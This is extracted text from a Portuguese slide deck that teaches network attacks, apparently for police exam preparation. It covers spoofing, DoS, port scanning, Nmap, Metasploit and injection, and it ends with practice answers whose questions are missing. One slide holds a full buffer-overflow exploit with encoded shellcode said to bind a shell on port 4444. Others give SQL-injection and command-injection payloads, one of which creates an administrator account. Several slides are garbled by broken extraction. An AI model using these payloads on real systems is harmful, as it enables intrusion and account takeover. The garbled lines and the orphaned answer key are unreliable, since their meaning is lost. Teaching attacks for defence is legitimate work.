Ataques em redes de computadores Tipos
Ataques em redes de computadores Ataques ARP Spoofing Enganar o mapemento entre o endereço MAC e o enderereço IP feito pelo protocolo ARP (Address Resolution Protocol). !"#$%$&' )* #$ +, -./0
!"#$%$&' !/1$%"$/ #$ 23 -./0
Ataques em redes de computadores Ataques ARP Spoofing (cont.) Deste ataque deriva uma técnica que permite fazer sniffing em uma rede com switches, mesmo sem o uso de portas de monitoramento=
Ataques em redes de computadores Ataques ARP Spoofing : Ferramenta EtterCap Mutito utilizada para fazer ataques ARP Spoofing e seus derivantes.
Ataques em redes de computadores Ataques DNS Spoofing Ataque derivante do ARP Spoofing Tem como objetivo desviar todas as solicitações de DNS que iriam para a internet para um DNS server controlado pelo hacker. Com este controle é possível fazer o usuário abrir páginas com códigos maliciosos, fazendo que estas passem para o controle do atacante A ferramenta Ettercap também é utilizada para este ataque
Ataques em redes de computadores IP Spoofing Falsificação de endereço IP de origem; Não é possível obter respostas – vai para o endereço forjado; Muito usado em ataques de negação de serviço (Denial-ofService, DoS); Egress Filtering para prevenção (anti-spoofing).
Ataques em redes de computadores Fragmentação de pacotes IP Característica do próprio protocolo; MTU (Maximum Transfer Unit) – Ethernet é 1500, FDDI é 4470; Fragmentação e reagrupamento (desfragmentação); Uso de offsets para o reagrupamento.
Ataques em redes de computadores Fragmentação de pacotes IP (cont.) Ping of Death; Teadrop; Land; Overlapping Fragment Attack.
Ataques em redes de computadores Denial of Service Afeta a disponibilidade da informação; Explora recursos de uma forma agressiva, estressando-os e impedindo-os de realizar suas tarefas básicas; Usuários legítimos ficam impedidos de acessar o recurso; Pode “derrubar” um servidor, encher um link, estourar a memória ou explorar uma vulnerabilidade.
Ataques em redes de computadores SYN Flooding !"#$%&$
' $()#*+( ' ,- /$01 2
=>(#+/ ?:<+&$/ ',' ,- /$01 34 5!6 2 7 8
@#": *:/ <+%$2A$/ *+ /$()#*+(
' ,- C"++*#%D !+%$29+ $/&:;$"$<#*:
Ataques em redes de computadores Smurf e Fraggle Pacote PING (ICMP echo) para o endereço broadcast da rede, usando IP Spoofing; Todos os hosts da rede respondem ao PING para o host que teve o seu endereço falsificado (IP Spoofing); Duas vítimas: a rede, que fica congestionada, e o host que teve o seu endereço falsificado. Fraggle usa UDP ao invés de ICMP.
Ataques em redes de computadores Session Hijacking (Sequestro de sessões) Man-in-the-Middle ou Session Hijacking; Explora o prognóstico do número de seqüência (sequence number prediction) do three-way handshake; O atacante fica entre o cliente e o servidor, podendo assim alterar toda a comunicação entre eles; O atacante envia informações infiltrando-se nas conexões, baseado na descoberta do número de seqüência dessas conexões.
Ataques em redes de computadores Ataques coordenados Ataque de negação de serviço distribuído, ou Distributed Denial-of-Service (DDoS); Dificuldade de descobrir a origem dos ataques: milhares de origens do ataque; Botnets - Redes de zumbis (bots) que atendem a comandos de uma central de comando e controle (C2), realizando ataques contra alvos determinados pelos seus mestres Todos os zumbis e os alvos de seus ataques são vítimas.
Ataques em redes de computadores Buffer Overflow Exploração de uma falha na aplicação, onde uma variável do programa pode expor outras áreas da memória ao hacker, permitindo sua manipulação, mesmo remota, com o carregamento de códigos maliciosos. Muitas técnicas auxiliam na descobertas destas vulnerabilidades, tornando-se cada vez mais comuns
Ataques em redes de computadores #buffer = "A" * 2000 buffer="\x41"*969 buffer+="\xed\x1e\x94\x7c" #buffer+="\7c" + "\94" + "\1E" + "\ED" #buffer+="\x42" * 4 buffer+="\x43" * 16 buffer+="\x90" * 16 buffer+=("\xb8\x52\x1c\x20\xa1\xd9\xe1\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x5d\xfe\xd5\x5d\x89\x77" "\x15\x9e\x49\xe8\x9f\x7b\x78\x3a\xfb\x08\x28\x8a\x8f\x5d\xc0" "\x61\xdd\x75\x53\x07\xca\x7a\xd4\xa2\x2c\xb4\xe5\x02\xf1\x1a" "\x25\x04\x8d\x60\x79\xe6\xac\xaa\x8c\xe7\xe9\xd7\x7e\xb5\xa2" "\x9c\x2c\x2a\xc6\xe1\xec\x4b\x08\x6e\x4c\x34\x2d\xb1\x38\x8e" "\x2c\xe2\x90\x85\x67\x1a\x9b\xc2\x57\x1b\x48\x11\xab\x52\xe5" "\xe2\x5f\x65\x2f\x3b\x9f\x57\x0f\x90\x9e\x57\x82\xe8\xe7\x50" "\x7c\x9f\x13\xa3\x01\x98\xe7\xd9\xdd\x2d\xfa\x7a\x96\x96\xde" "\x7b\x7b\x40\x94\x70\x30\x06\xf2\x94\xc7\xcb\x88\xa1\x4c\xea" "\x5e\x20\x16\xc9\x7a\x68\xcd\x70\xda\xd4\xa0\x8d\x3c\xb0\x1d" "\x28\x36\x53\x4a\x4a\x15\x3c\xbf\x61\xa6\xbc\xd7\xf2\xd5\x8e" "\x78\xa9\x71\xa3\xf1\x77\x85\xc4\x28\xcf\x19\x3b\xd2\x30\x33" "\xf8\x86\x60\x2b\x29\xa6\xea\xab\xd6\x73\xbc\xfb\x78\x2b\x7d" "\xac\x38\x9b\x15\xa6\xb6\xc4\x06\xc9\x1c\x73\x01\x07\x44\xd0" "\xe6\x6a\x7a\xc7\xaa\xe3\x9c\x8d\x42\xa2\x37\x39\xa1\x91\x8f" "\xde\xda\xf3\xa3\x77\x4d\x4b\xaa\x4f\x72\x4c\xf8\xfc\xdf\xe4" "\x6b\x76\x0c\x31\x8d\x89\x19\x11\xc4\xb2\xca\xeb\xb8\x71\x6a" "\xeb\x90\xe1\x0f\x7e\x7f\xf1\x46\x63\x28\xa6\x0f\x55\x21\x22" "\xa2\xcc\x9b\x50\x3f\x88\xe4\xd0\xe4\x69\xea\xd9\x69\xd5\xc8" "\xc9\xb7\xd6\x54\xbd\x67\x81\x02\x6b\xce\x7b\xe5\xc5\x98\xd0" "\xaf\x81\x5d\x1b\x70\xd7\x61\x76\x06\x37\xd3\x2f\x5f\x48\xdc" "\xa7\x57\x31\x00\x58\x97\xe8\x80\x66\x69\x20\x1d\xfe\xd0\xd1" "\x5c\x62\xe3\x0c\xa2\x9b\x60\xa4\x5b\x58\x78\xcd\x5e\x24\x3e" "\x3e\x13\x35\xab\x40\x80\x36\xfe")
Acionamento da vulnerabilidade
Código malicioso que criará uma porta adicional (4444/ TCP) e dará acesso remoto ao shell do computador
Ataques em redes de computadores Tipos de shell Normalmente um ataque buffer overflow é usado para obter um shell no sistema alvo Existem dois tipos básicos Direct shell - Uma porta é aberta no sistema alvo e é associada a um shell do sistema operacional Reverse shell - O código malicioso que foi executado no alvo estabelece uma conexão com o computador do atacante e transmite, através desta conexão, o acesso ao shell no sistema alvo Conseguimos criar um shell (reverso ou direto) com algumas ferramentas, como o Netcat (comando nc no Linux) que permite algumas outras atividades ou com o Meterpreter, parte integrante do Metasploit, que é capaz de entregar ao atacante um shell avançado, com algumas funções para simplificar a coleta de informações no servidor alvo.
Ataques em redes de computadores Shell reverso e tunneling Uma das grandes vantagens do shell reverso é a possibilidade de bypass o firewall local, pois não há necessidade em abrir uma porta no alvo. O alvo se comunica com o atacante Contudo, pela existência de um firewall, pode ser impossível um ataque a determinada porta que tenhamos descoberto haver outra vulnerabilidade a ser explorada. Nestes cenários podemos aplicar uma técnica chamada tunneling, onde usamos um cliente de SSH no alvo que já obtivemos acesso para redirecionar o tráfego a uma outra porta local (por exemplo 3389/TCP - Remote desktop no Windows) atráves de um túnel cifrado pelo SSH
Ataques em redes de computadores
Ataques em redes de computadores Escaneamento Atividade realizada para descobrir portas e serviços nos hosts alvo Se feito corretamente pode passar desapercebido para o administrador da rede Contudo, sem os devidos cuidados pode aparecer imediatamente nas telas de IDS/IPS da rede
Ataques em redes de computadores Three-way handshake do TCP Three-way handshake do TCP: O cliente envia uma requisição de conexão – pacote SYN; O servidor recebe o pacote SYN e responde com uma resposta de reconhecimento (acknowledgement) – pacote SYN-ACK; O cliente reconhece o pacote SYN-ACK – pacote ACK; A conexão é estabelecida (three-way handshake); A troca de dados acontece; A conexão é encerrada com um pacote com flag FIN; A conexão é encerrada de forma anormal com pacote RST.
Ataques em redes de computadores TCP Connect: Cliente envia um pacote SYN para a porta; Caso o servidor aceite a conexão, a porta está aberta; Caso contrário, a porta está fechada. TCP SYN (half open): Cliente envia um pacote SYN para a porta; Caso o servidor responda com SYN-ACK, o cliente envia RST – a conexão é encerrada antes do seu estabelecimento.
Ataques em redes de computadores UDP: Cliente envia um pacote UDP de 0 byte para a porta; Caso o servidor envie um pacote ICMP Port Unreachable, a porta está fechada; Caso contrário, a porta está aberta. FIN: Modo stealth, ou seja, são mais difíceis de serem ser em detectados; Pacote FIN é enviado para a porta do servidor; Caso um pacote RST é recebido, a porta está fechada.
Ataques em redes de computadores Null Scan: Modo stealth; Pacote FIN, sem nenhum flag, é enviado para a porta do servidor; Caso um pacote RST é recebido, a porta está fechada. FIN: Modo stealth; Pacote FIN com os flags FIN, PUSH e URG ativados é enviado para a porta do servidor; Caso um pacote RST é recebido, a porta está fechada.
Ataques em redes de computadores Idle Scan Técnica utilizada para fazer escaneamento oculto Se baseia na avaliação do contado de pacote IP (IPID) do protocolo TCP/IP Previamente ele manda um SYN para um host Zumbi e determina qual o IPID atual dele. O atacante manda um pacote SYN para o alvo, com o IP spoofado do host Zumbi, direcionado a porta que ele deseja testar se está aberta ou não. Depois o hacker testa novamente o atual IPID do host Zumbi Se houve incremendo do IPID então a porta está aberta, pois o host alvo respondeu para o zumbi com um “SYN-ACK” Se não houver incremento a porta está fechada, pois o host respondeu ao Zumbi com um pacote “RST” Caso haja um IPS no host alvo apenas aparecerá os logs dos pacotes do zumbi, mas não do atacante real
Ataques em redes de computadores Idle Scan (cont.)
Ataques em redes de computadores Ferramentas para escanemento NMAP - A mais popular das ferramentas para escanemento Muito versátil, possui diversos recursos para descoberta de vulnerabilidades e “bypass” de IDS / IPS
Ataques em redes de computadores # nmap -A -T4 scanme.nmap.org playground
Starting nmap ( http://insecure.org/nmap/ ) Interesting ports on scanme.nmap.org (205.217.153.62): (The 1663 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) 53/tcp open domain 70/tcp closed gopher 80/tcp open http Apache httpd 2.0.52 ((Fedora)) 113/tcp closed auth Device type: general purpose Running: Linux 2.4.X|2.5.X|2.6.X OS details: Linux 2.4.7 - 2.6.11, Linux 2.6.0 - 2.6.11 Uptime 33.908 days (since Thu Jul 21 03:38:03 2005) Interesting ports on playground.nmap.org (192.168.0.40): (The 1659 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 389/tcp open ldap? 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1002/tcp open windows-icfw? 1025/tcp open msrpc Microsoft Windows RPC 1720/tcp open H.323/Q.931 CompTek AquaGateKeeper 5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port: 5900) 5900/tcp open vnc VNC (protocol 3.8) MAC Address: 00:A0:CC:63:85:4B (Lite-on Communications) Device type: general purpose Running: Microsoft Windows NT/2K/XP OS details: Microsoft Windows XP Pro RC1+ through final release Service Info: OSs: Windows, Windows XP Nmap finished: 2 IP addresses (2 hosts up) scanned in 88.392 seconds
Ataques em redes de computadores NMAP - Opções mais comuns -sP - Ping Scan - Procura hosts através de ICMP -P0 - Não faz mais um ICMP discovery prévio -sS (TCP SYN), -sT (Connect), -sA (ACK), sU (Scan UDP ports) -sI - Idle Scan -p Lista de portas a escanear (se for omitido escaneará as chamadas Well Known ports) -sV - Tenta obter informações sobre o serviço rodando nas portas abertas -O - OS Fingerprint detection -T[0-5] - Regula a velocidade dos scans -f - Fragmentar pacotes -D - Decoy -S - Spoofar o IP
Ataques em redes de computadores Ferramentas para atacar - Metasploit Framework Consite em um framework completo, com diversos exploit prontos para uso, ferramentas para descoberta de novas vulnerabilidades, dentre outros Muito utilizado por hackers, auditores de segurança e estudantes da área De simples utilização (pode até mesmo ser automatizado) Novos exploits são adicionados diáriamente e suas atualizações são gratúitas Faz parte da distribuição Linux “Backtrack”
Ataques em redes de computadores
Ataques em redes de computadores Ferramentas para ataques em Web App Nikto Scanner de vulnerabilidades em servidores WEB Muito útil para descobrir fraquezas e erros de configuração em servidores WEB Simples de usar Faz parte do “Backtrack” Algumas informações podem também ser obtidas com um telnet paras a porta do servidor WEB e um comando HTTP (exemplo HEAD/HTTP/1.0 pode retornar o banner do servidor)
Ataques em redes de computadores
Ataques em redes de computadores Ataques de injeção Em algumas situações é possível injetar informações em formulários e alterar o comportamento de uma aplicação. Os tipos mais comuns são Injeção SQL - Atua modificando uma requisição legítima de SQL (ex: Fazer a autenticação de um usuário) para outra a escolha o hacker. Ex: Consulta SQL normal: select * from user where senha =; Ao digitarmos no formulário WEB a consulta abaixo no lugar da senha: ‘ or 1=1 --; droptable(); Ao invés de fazer uma tentativa de login nós apagaremos a tabela de usuários. Injeção de comandos - Comum em sistemas que executam comandos remotos e pedem o parametro por um formulário web (exemplo: traceroute para um destino definido pelo formulário). Se ao invés do IP fosse digitado: ; net user /add hacker hacker | net localgroup administrator hacker; Ao invés de fazermos o traceroute nós criariamos um usuário, com acesso total (pois seria administrador), podendo conceder acesso via Remote Desktop (se fosse linux bastaria criar um usuário, clocar no grupo root e
Ataques em redes de computadores Ferramentas para ataques em Web App Dirbuster Ferramenta que descobre arquivos hospedados em um servidor WEB, mesmo que estejam ocultos, com um uso de um arquivo de dicionário Testa o servidor WEB procurando erros. Se tentar acessar determinado arquivo e receber uma mensagem, dizendo que o arquivo existe, mesmo que não seja possível acesso a ele, o mesmo será exibido em uma listagem.
Ataques em redes de computadores
Questões para praticar
Questões para praticar
Resposta: C
Questões para praticar
Respostas: A,B,C,D. Sam Spade é um pacote de ferramentas antigo, que pode fazer ping, traceroute e outras funções. Cheops é uma ferramenta de monitoramento de rede.
Questões para praticar
Resposta: B
Questões para praticar
Respostas: A, C, E
Questões para praticar
Resposta: A - Usuários administradores tem sempre seu RID (relative identifier) começando com 500
Questões para praticar
Resposta: D
Questões para praticar
Resposta: C
Questões para praticar
Resposta: C
Questões para praticar
Resposta: C
Questões para praticar
Resposta: A
Questões para praticar
Respostas: A e B
Questões para praticar
Resposta: E
Questões para praticar
Resposta: D
Questões para praticar
Resposta: C
Questões para praticar
Respostas: A e B. Notar que os 8 caracteres são identicos
Questões para praticar
Resposta: D
Questões para praticar
Resposta: A
Questões para praticar
Resposta: D
Questões para praticar
Resposta: E
Questões para praticar
Resposta: B - Consultar a tabela ASCII para entender a linha “0B0”
Questões para praticar
Resposta: B
Questões para praticar
Resposta: C - Converter o número para binário, depois pegar os últimos 8 bits e converter para decimal, obtendo o .5
Questões para praticar
Resposta: A
Questões para praticar
Resposta: A
Questões para praticar
Resposta: A
Questões para praticar
Revisão de provas da PF